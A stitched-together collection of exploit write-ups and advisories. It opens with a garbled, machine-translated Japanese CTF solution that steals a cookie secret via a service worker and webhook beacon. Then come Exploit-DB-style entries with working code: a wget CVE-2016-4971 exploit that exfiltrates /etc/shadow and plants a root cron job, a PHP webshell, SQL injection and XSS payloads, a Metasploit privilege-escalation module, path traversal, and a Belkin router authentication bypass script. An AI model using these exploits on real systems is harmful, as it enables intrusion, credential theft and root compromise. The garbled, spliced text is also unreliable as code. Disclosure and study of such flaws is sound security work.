最初の質問は、まず、 /API /テンプレートのコンテンツが制御可能なuserame+の素晴らしいエキスパートページで構成されていることです。以下を確認しますか? ExpressJSの単純なコード。コードの次の部分は、当然合法的なJSコードです。最初の部分はどうですか?最初の行がコメントアウトされている限り、ページ全体のコンテンツが合法的なJSであるということは本当ですか?
答えはイエスです。ただし、ここではユーザー名が制限されており、使用できません /。 //または /*は使用できません。ただし、フロントエンドでJSの別のコメント方法を使用して、最初の行をコメントします。これにより、 /API /テンプレートのコンテンツ全体がJSになります。
2番目の質問は、スクリプトのロードコンテンツを投稿する方法です。ここでの私のアプローチは、サービスワーカーを使用して /API /テンプレートにリクエストを変更することです。サービスワーカーはブラウザサイドエージェントと同等であることがわかっているため、自然に投稿することができます。次に、最終的なソリューションが明らかになります。
サービスワーカーを登録したいので、HTTPサービスを提供するようにノードサーバーをローカルにセットアップし、NGROKを使用して一時的なHTTPSドメイン名を取得します。その中で、SW.JSは、get to postから /api /テンプレートに送信されたリクエストメソッドを変更します。
server.js
const express=require( 'express');
const app=express();
const logger=require( 'morgan');
app.use(logger( 'dev'));
app.get( '/'、(_、res)={
REST res.sendfile(__ dirname + '/solve.html');
})
app.get( '/exp'、(_、res)={
REST res.sendfile(__ dirname + '/exp.html');
})
app.get( '/sw.js'、(_、res)={
Res.Type( 'Application/JavaScript');
RETURN RES.SEND( `self.addeventlistener( 'fetch'、(event)={
event.respondwith((async())={
それをしましょう;
if(event.request.url.includes( 'Template')){
resp=await fetch(event.request、{
Method: 'post'、
headers: {
'content-type':'アプリケーション/x-www-form-urlencoded '
}、
body: 'username=! - '、
ReferRerPolicy: 'no-referrer'
});
RETURN REST;
} それ以外{
return await fetch(event.request);
}
})());
}); `)
})
app.listen(9000)copysolve.html。サービスワーカーを登録するために使用されます
!doctype html
HTML
頭
TitleSolve/Title
スクリプト
if( 'serviceworker' in Navigator){
window.addeventlistener( 'load'、()={
const sw='https://6ad8-47-94-110-102.ngrok.io/sw.js';
navigator.serviceworker.register(sw、{scope: '/'})
.then((register)={
navigator.sendbeacon( 'https://webhook.site/E708EB94-EA07-490A-969A-742D40033925'、「登録」);
setimeout(()={
window.open( '/exp')
}、100);
}、(err)={
navigator.sendbeacon( 'https://webhook.site/e708eb94-ea07-490a-969a-742d40033925'、 '登録失敗');
console.log( 'Service Worker error:'、err);
});
});
}
/スクリプト
/頭
体
BYC_404はこれを手に入れました
/体
/htmlcopyexp.html。ロード /API /テンプレートとadmin_usernameとcookie_secretをフックから取得します。ここでは、主にいくつかの関数を書き換えて追加して、NodeJSの下のコードをまだ合法化してフロントエンドJSに入れます。同時に、取得したいコンテンツステートメントは、global.process.env.admin_username.setflag(cookie_secret)です。プロキシを使用してHookGlobalを使用してプロパティにアクセスしたり、メソッドを呼び出したりすることができます。
体
スクリプト
const target='https://prettyjs.bycsec404.top';
const script=document.createelement( 'script');
script.referrerpolicy='no-referrer';
script.src=ターゲット + '/api/テンプレート'
document.body.AppendChild(スクリプト);
const require=(module)={
if(module=='Express'){
return()={
戻る {
use:()={}、
all:()={}、
聞きます:()={}、
get:(data、func)={
object.prototype.global=new Proxy({}、Handler);
func( 'byc_404'、{send:()={}});
=============================================
- Release date: 06.07.2016
- Discovered by: Dawid Golunski
- Severity: High
- CVE-2016-4971
=============================================
I. VULNERABILITY
-------------------------
GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution
II. BACKGROUND
-------------------------
"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.
GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"
https://www.gnu.org/software/wget/
III. INTRODUCTION
-------------------------
GNU Wget before 1.18 when supplied with a malicious URL (to a malicious or
compromised web server) can be tricked into saving an arbitrary remote file
supplied by an attacker, with arbitrary contents and filename under
the current directory and possibly other directories by writing to .wgetrc.
Depending on the context in which wget is used, this can lead to remote code
execution and even root privilege escalation if wget is run via a root cronjob
as is often the case in many web application deployments.
The vulnerability could also be exploited by well-positioned attackers within
the network who are able to intercept/modify the network traffic.
IV. DESCRIPTION
-------------------------
Because of lack of sufficient controls in wget, when user downloads a file
with wget, such as:
wget http://attackers-server/safe_file.txt
an attacker who controls the server could make wget create an arbitrary file
with an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect
containing FTP server reference in response to the victim's wget request.
For example, if the attacker's server replies with the following response:
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache
wget will automatically follow the redirect and will download a malicious
.bash_profile file from a malicious FTP server.
It will fail to rename the file to the originally requested filename of
'safe_file.txt' as it would normally do, in case of a redirect to another
HTTP resource with a different name.
Because of this vulnerability, an attacker is able to upload an arbitrary file
with an arbitrary filename to the victim's current directory.
Execution flow:
victim@trusty:~$ wget --version | head -n1
GNU Wget 1.17 built on linux-gnu.
victim@trusty:~$ pwd
/home/victim
victim@trusty:~$ ls
victim@trusty:~$
victim@trusty:~$ wget http://attackers-server/safe-file.txt
Resolving attackers-server... 192.168.57.1
Connecting to attackers-server|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: ftp://192.168.57.1/.bash_profile [following]
=> ‘.bash_profile’
Connecting to 192.168.57.1:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE .bash_profile ... 55
==> PASV ... done. ==> RETR .bash_profile ... done.
Length: 55 (unauthoritative)
.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s
2016-02-19 04:50:37 (1.27 MB/s) - ‘.bash_profile’ saved [55]
victim@trusty:~$ ls -l
total 4
-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile
victim@trusty:~$
This vulnerability will not work if extra options that force destination
filename are specified as a paramter. Such as: -O /tmp/output
It is however possible to exploit the issue with mirroring/recursive options
enabled such as -r or -m.
Another limitation is that attacker exploiting this vulnerability can only
upload his malicious file to the current directory from which wget was run,
or to a directory specified by -P option (directory_prefix option).
This could however be enough to exploit wget run from home directory, or
within web document root (in which case attacker could write malicious php files
or .bash_profile files).
The current directory limitation could also be bypassed by uploading a .wgetrc
config file if wget was run from a home directory.
By saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget
settings such as destination directory for all downloaded files in future,
as well as set a proxy setting to make future requests go through a malicious
proxy server belonging to the attackers to which they could send further
malicious responses.
Here is a set of Wget settings that can be helpful to an attacker:
dir_prefix = string
Top of directory tree—the same as ‘-P string’.
post_file = file
Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’.
recursive = on/off
Recursive on/off—the same as ‘-r’.
timestamping = on/off
Allows to overwrite existing files.
cut_dirs = n
Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).
http_proxy
HTTP Proxy server
https_proxy
HTTPS Proxy server
output_document = file
Set the output filename—the same as ‘-O file’.
input = file
Read the URLs from string, like ‘-i file’.
metalink-over-http
Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers.
Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.
Full list of .wgetrc options can be found in:
https://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands
V. PROOF OF CONCEPT EXPLOIT
-------------------------
1) Cronjob with wget scenario
Often wget is used inside cronjobs. By default cronjobs run within home
directory of the cronjob owner.
Such wget cronjobs are commonly used with many applications used to download
new version of databases, requesting web scripts that perform scheduled tasks
such as rebuilding indexes, cleaning caches etc.
Here are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on
the Internet with exploitable wget cronjobs:
https://codex.wordpress.org/Post_to_your_blog_using_email
https://docs.moodle.org/2x/ca/Cron
http://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site
http://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel
Such setup could be abused by attackers to upload .bash_profile file through
wget vulnerability and run commands in the context of the victim user upon
their next log-in.
As cron runs priodically attackers, could also write out .wgetrc file in the
first response and then write to /etc/cron.d/malicious-cron in the second.
If a cronjob is run by root, this would give them an almost instant root code
execution.
It is worth noting that if an attacker had access to local network they could
potentially modify unencrypted HTTP traffic to inject malicious 30X Redirect
responses to wget requests.
This issue could also be exploited by attackers who have already gained
access to the server through a web vulnerability to escalate their privileges.
In many cases the cron jobs (as in examples above) are set up to request
various web scripts e.g:
http://localhost/clean-cache.php
If the file was writable by apache, and attacker had access to www-data/apache
account, they could modify it to return malicious Location header and exploit
root cronjob that runs the wget request in order to escalate their privileges
to root.
For simplicity we can assume that attacker already has control over the server
that the victim sends the request to with wget.
The root cronjob on the victim server may look as follows:
root@victim:~# cat /etc/cron.d/update-database
# Update database file every 2 minutes
*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1
In order to exploit this setup, attacker first prepares a malicious .wgetrc
and starts an FTP server:
attackers-server# mkdir /tmp/ftptest
attackers-server# cd /tmp/ftptest
attackers-server# cat <<_EOF_>.wgetrc
post_file = /etc/shadow
output_document = /etc/cron.d/wget-root-shell
_EOF_
attackers-server# sudo pip install pyftpdlib
attackers-server# python -m pyftpdlib -p21 -w
At this point attacker can start an HTTP server which will exploit wget by
sending malicious redirects to the victim wget's requests:
---[ wget-exploit.py ]---
#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#
import SimpleHTTPServer
import SocketServer
import socket;
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc
print "We have a volunteer requesting " + self.path + " by GET :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
self.send_response(301)
new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
print "Sending redirect to %s \n"%(new_path)
self.send_header('Location', new_path)
self.end_headers()
def do_POST(self):
# In here we will receive extracted file and install a PoC cronjob
print "We have a volunteer requesting " + self.path + " by POST :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(ROOT_CRON)
print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
return
HTTP_LISTEN_IP = '192.168.57.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.57.1'
FTP_PORT = 21
ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
print "FTP is down :( Exiting."
exit(1)
print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()
---[ eof ]---
Attacker can run wget-exploit.py and wait a few minutes until the victim's server executes
the aforementioned cronjob with wget.
The output should look similar to:
---[ wget-exploit.py output ]---
attackers-server# python ./wget-exploit.py
Ready? Is your FTP server running?
FTP found open on 192.168.57.1:21. Let's go then
Serving wget exploit on port 80...
We have a volunteer requesting /database.db by GET :)
Uploading .wgetrc via ftp redirect vuln. It should land in /root
192.168.57.10 - - [26/Feb/2016 15:03:54] "GET /database.db HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc
We have a volunteer requesting /database.db by POST :)
Received POST from wget, this should be the extracted /etc/shadow file:
---[begin]---
root:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::
daemon:*:16484:0:99999:7:::
bin:*:16484:0:99999:7:::
sys:*:16484:0:99999:7:::
sync:*:16484:0:99999:7:::
games:*:16484:0:99999:7:::
man:*:16484:0:99999:7:::
lp:*:16484:0:99999:7:::
...cut...
---[eof]---
Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
192.168.57.10 - - [26/Feb/2016 15:05:54] "POST /database.db HTTP/1.1" 200 -
File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :)
---[ output eof ]---
As we can see .wgetrc got uploaded by the exploit. It has set the post_file
setting to /etc/shadow.
Therefore, on the next wget run, wget sent back shadow file to the attacker.
It also saved the malicious cronjob script (ROOT_CRON variable) which should
create a file named /root/hacked-via-wget, which we can verify on the victim's
server:
root@victim:~# cat /etc/cron.d/wget-root-shell
* * * * * root /usr/bin/id > /root/hacked-via-wget
root@victim:~# cat /root/hacked-via-wget
uid=0(root) gid=0(root) groups=0(root)
2) PHP web application scenario
If wget is used within a PHP script e.g.:
<?php
// Update geoip data
system("wget -N -P geoip http://attackers-host/goeip.db");
?>
An attacker who manages to respond to the request could simply upload a PHP
backdoor of:
<?php
//webshell.php
system($_GET['cmd']);
?>
by using the wget-exploit script described in example 1.
After the upload he could simply execute the script and their shell
command by a GET request to:
http://victims-php-host/geoip/webshell.php?cmd=id
VI. BUSINESS IMPACT
-------------------------
Affected versions of wget that connect to untrusted (or compromised) web
servers could be tricked into uploading a file under an arbitrary name, or
even path (if wget is run from a home directory).
Depending on the context in which wget is used, this could lead to
uploading a web shell and granting the attacker access remote access to the
system, or privilege escalation. It could be possible for attackers to escalate
to root user if wget is run via root cronjob as it is often the case in web
application deployments and is recommended in some guides on the Internet.
The vulnerability could also be exploited by well-positioned attackers within
the networ who are able to intercept/modify the network traffic.
VII. SYSTEMS AFFECTED
-------------------------
All versions of Wget before the patched version of 1.18 are affected.
VIII. SOLUTION
-------------------------
Update to wget version 1.18 as advertised by the vendor at:
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
Linux distributions should update their wget packages. It is recommended
to update wget manually if an updated package is not available for your
distribution.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
http://www.ubuntu.com/usn/usn-3012-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
06.07.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
# Exploit Title: PaKnPost Pro Arbitrary File Upload & Remote Code Execution
# Date: 2016-07-06
# Product: PaKnPost Pro
# Vendor Homepage: http://www.paknpost.org
# Software Link: https://sourceforge.net/projects/paknpost/
# Version: <=1.14
# Tested on: Windows, Linux
# Exploit Authors: Edvin Rustemagic, Grega Preseren
# Contacts: https://www.linkedin.com/in/edvinrustemagic - https://si.linkedin.com/in/gregapreseren
===========
Description
===========
File extension check bypass and directory traversal lead to uploading an arbitrary file to an unintended directory and remote code execution.
=======
Details
=======
File extension check can be bypassed by using two extensions, out of which one must be allowed (select_.cgi:368).
Directory traversal vulnerability exists in the GET parameter sid, where no validation checks are made (select_.cgi:204).
Exploitation of these two vulnerabilities allows an attacker to upload a webshell to an executable directory and gain command line access to the server. Windows deployments turned out to be more likely exploitable with a consequence of gaining SYSTEM privileges.
========
Timeline
========
2016-03-15 Vulnerability discovered at customer's deployment.
2016-06-13 PoC completed for Linux and Windows platforms.
2016-06-13 Author/Maintainer at SourceForge has been notified.
2016-06-21 Patch written and delivered to Author/Maintainer.
2016-06-23 Patch publicly released.
2016-07-06 Exploit submitted to Exploit-DB.
=======================
Windows PoC Environment
=======================
- Windows Server 2003 R2 SP2
- Apache 2.2.10
- ActivePerl 5.8.0.806
=====================
Linux PoC Environment
=====================
- Debian 8.3
- Apache 2.4.10
- Perl 5.20.2
=======
Exploit
=======
1. File upload GET parameter 'sid' can be exploited in order to upload an arbitrary file to an unintended executable directory.
2. File upload multipart POST parameter 'filename' can include two extensions to bypass file extension check.
For example:
POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/1.1
Host: paknpost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://paknpost/cgi-bin/pnp/select.cgi
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------6077763223847
Content-Length: 6087
-----------------------------6077763223847
Content-Disposition: form-data; name="file[1]"; filename="pnp-test.txt.cgi"
Content-Type: application/octet-stream
==============
Solution/Patch
==============
a. Update to version 1.15
b. Or apply the following patch:
--- select_.cgi.ORIG 2016-03-29 22:56:40.868000000 +0200
+++ select_.cgi 2016-06-14 10:18:37.864000000 +0200
@@ -201,6 +201,9 @@
}
# Create the new Holding Area
+if ($sessionid =~ m/[^\w]/) {
+ &error(file_write);
+}
$user_dir = $upload_dir.$sessionid;
if (-d "$user_dir")
{
@@ -365,7 +368,7 @@
if ($file_check)
{
# Exclude all except acceptable file extensions as a fist cut to file checks
- unless (grep($fhl =~ /$_/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
+ unless (grep($fhl =~ /$_$/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
$debug1 = "Passed";
AWBS v2.9.6 Multiple Remote Vulnerabilities
Vendor: Total Online Solutions, Inc.
Product web page: http://www.awbs.com
Affected version: 2.9.6
Platform: PHP
Summary: Whether starting new or looking to expand your
existing web hosting and/or domain registration business,
the AWBS fully automated solutions and unique features will
allow you achieve your goal with minimum effort and cost.
Desc: AWBS suffers from multiple SQL Injection vulnerabilities.
Input passed via the 'cat' and 'so' GET parameters are not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code. Multiple cross-site scripting vulnerabilities were also
discovered. The issue is triggered when input passed via multiple
parameters is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Apache
PHP/5.3.28
MySQL/5.5.50-cll
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5337
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5337.php
08.06.2016
--
1. SQL Injection:
-----------------
Parameter: cat, so (GET)
POC URL:
http://localhost/admin/omanage.php?search=1&cat=status%27&list=1&so=status
http://localhost/admin/hostingadmin.php?list=f&so=domain%27
http://localhost/admin/aomanage.php?search=1&cat=status%20UNION%20select%201,2,3,version%28%29,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&list=3&so=status'
http://localhost/admin/hostingarchiveadmin.php?search=1&cat=status UNION select 1--&list=1&so=status'
http://localhost/admin/dsarchiveadmin.php?search=1&cat=status&list=3&so=31
http://localhost/admin/domainadmin.php?search=&cat=&list=&sd=&so=100
2. Cross-Site Scripting (Stored):
---------------------------------
http://localhost/admin/cmanage.php
Parameters: reason (POST)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://localhost/admin/helpdesk.php
Parameters: hd_name, hd_url, hd_subject (POST)
Payload(s):
Content-Disposition: form-data; name="hd_name"
"><script>alert(1)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_url"
"><script>alert(2)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_subject"
<img src=x onerror=alert(3)>
-----------------------------28698210634144
3. Cross-Site Scripting (Reflected):
------------------------------------
http://localhost/admin/useradmin.php
Parameters: list (POST)
http://localhost/admin/omanage.php?search=1%22%3E%3Cscript%3Ealert%283%29%3C/script%3E&cat=status%22%3E%3Cscript%3Ealert%284%29%3C/script%3E&list=4%22%3E%3Cscript%3Ealert%282%29%3C/script%3E&so=status%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameters: search, cat, list, so (GET)
http://localhost/admin/ccmanage.php?find_enc=1&list=1%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameter: list (GET)
http://localhost/admin/cmanage.php?edit=1&action=edit&add_credits=1&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&search=&cat=&list=&sd=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E
Parameters: id, sd (GET)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
'Description' => %q{
This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn
a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
the specified payload within the context of the elevated process.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tamas Koczka', # Original Exploit
'William Webb <william_webb[at]rapid7.com>' # C port and Metasploit module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => 'false'
},
'Targets' =>
[
[ 'Windows 7 SP1', { } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2016-0051' ],
[ 'MSB', 'MS16-016' ]
],
'DisclosureDate' => 'Feb 09 2016',
'DefaultTarget' => 0
}))
end
def check
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
print_status("Launching notepad to host the exploit...")
notepad_process_pid = cmd_exec_get_pid("notepad.exe")
begin
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Hosting exploit in the current process...")
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
library_path = ::File.expand_path(library_path)
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected ... injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
thread = process.thread.create(exploit_mem + offset, payload_mem)
sleep(3)
print_status("Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
end
end
######################
# Application Name : Streamo - Online Radio And Tv Streaming CMS
# Google Dork : inurl:rjdetails.php?id=
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://rexbd.net/
# Vulnerable Type : SQL Injection
# Date : 2016-07-08
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/menu.php
http://localhost/[path]/programs.php
http://localhost/[path]/rjdetails.php
######################
# Vulnerable code :
$gid = $_GET["id"];
######################
# PoC Exploit:
http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY
---
######################
# Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download
# Date: 11-07-2016
# Software Link: https://tiki.org
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Using `flv_stream.php` file from `vendor` directory we can download any file.
http://security.szurek.pl/tiki-wiki-cms-150-arbitrary-file-download.html
File: tiki-15.0\vendor\player\flv\flv_stream.php
<?php
session_cache_limiter('nocache');
header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
header('Pragma: no-cache');
$position = $_GET['position'];
$filename = dirname(__FILE__).'/'.htmlspecialchars($_GET['file']);
if (file_exists($filename)) {
header('Content-Type: video/x-flv');
if ($position != 0) {
echo 'FLV', pack('CCNN', 1, 1, 9, 9);
}
$file = fopen($filename, "rb");
fseek($file, $position);
while (!feof($file)) {
echo fread($file, 16384);
}
fclose($file);
} else {
echo 'The file does not exist';
}
?>
2. Proof of Concept
Example for downloading database configuration:
http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0
3. Solution:
Update to version 15.1
Timeline:
01-06-2016: Discovered
01-06-2016: Vendor notified
08-06-2016: Version 15.1 released, issue resolved
'''
# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
# Date: 5/11/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.belkin.com
# Version: Firmware: 1.00.27
# Tested on:F9K1113 v1
#1. Description:
#The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side
#authentication after you attempt to login after already having failed a login. That webpage, loginpserr.stm contains the md5 hash value of the administrators password. This can be
#exploited by extracting that hash value, and passing it in the pws field in a post request to
#login.cgi.
#I would like to note that I contacted Belkin on several occasions
#and gave them plenty of time to reply/fix the issue before releasing this entry.
#2. Proof:
#Line 55 of loginpserr.stm contains the javascript code:
#var password = "md5hashofpassword";
#3. Exploit:
'''
#!/usr/bin/python
import urllib
import urllib2
import sys
router = raw_input('Enter IP address of your AC1200 to test: ')
page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()
test_page = page
vuln_string = 'var password = "'
if vuln_string in test_page:
print 'Router is vulnerable.'
answer = raw_input('Would you like to exploit the target? Y/N : ')
else:
print 'Router is not vulnerable.'
print 'exiting...'
sys.exit()
if (answer == 'y') or (answer == 'Y'):
extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value
_hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter
else:
if (answer == 'n') or (answer == 'N'):
print 'exiting...'
sys.exit()
#Assemble the POST request to /login.cgi
headers = {
'Host': router,
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' : 'en-US,en;q=0.5',
'Accept-Encoding' : 'gzip, deflate',
'Referer' : 'http://'+router+'/',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded'
}
data = {
'totalMSec':'0',
'pws': _hash,
'url':'status.stm',
'arc_action':'login',
'pws_temp': ''
}
data = urllib.urlencode(data)
#Sends the POST request with the hash in the pws field
req = urllib2.Request('http://'+router+'/login.cgi', data, headers)
response = urllib2.urlopen(req)
the_page = response.read()
print 'Exploit successful.'
print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'
Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin
David Vaartjes
Abstract
A stored Cross-Site Scripting vulnerability was found in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.
Tested versions
This issue was successfully tested on the All in One SEO Pack WordPress Plugin version 2.3.6.1.
Fix
This issue has been fixed in version 2.3.7 of the plugin.
Introduction
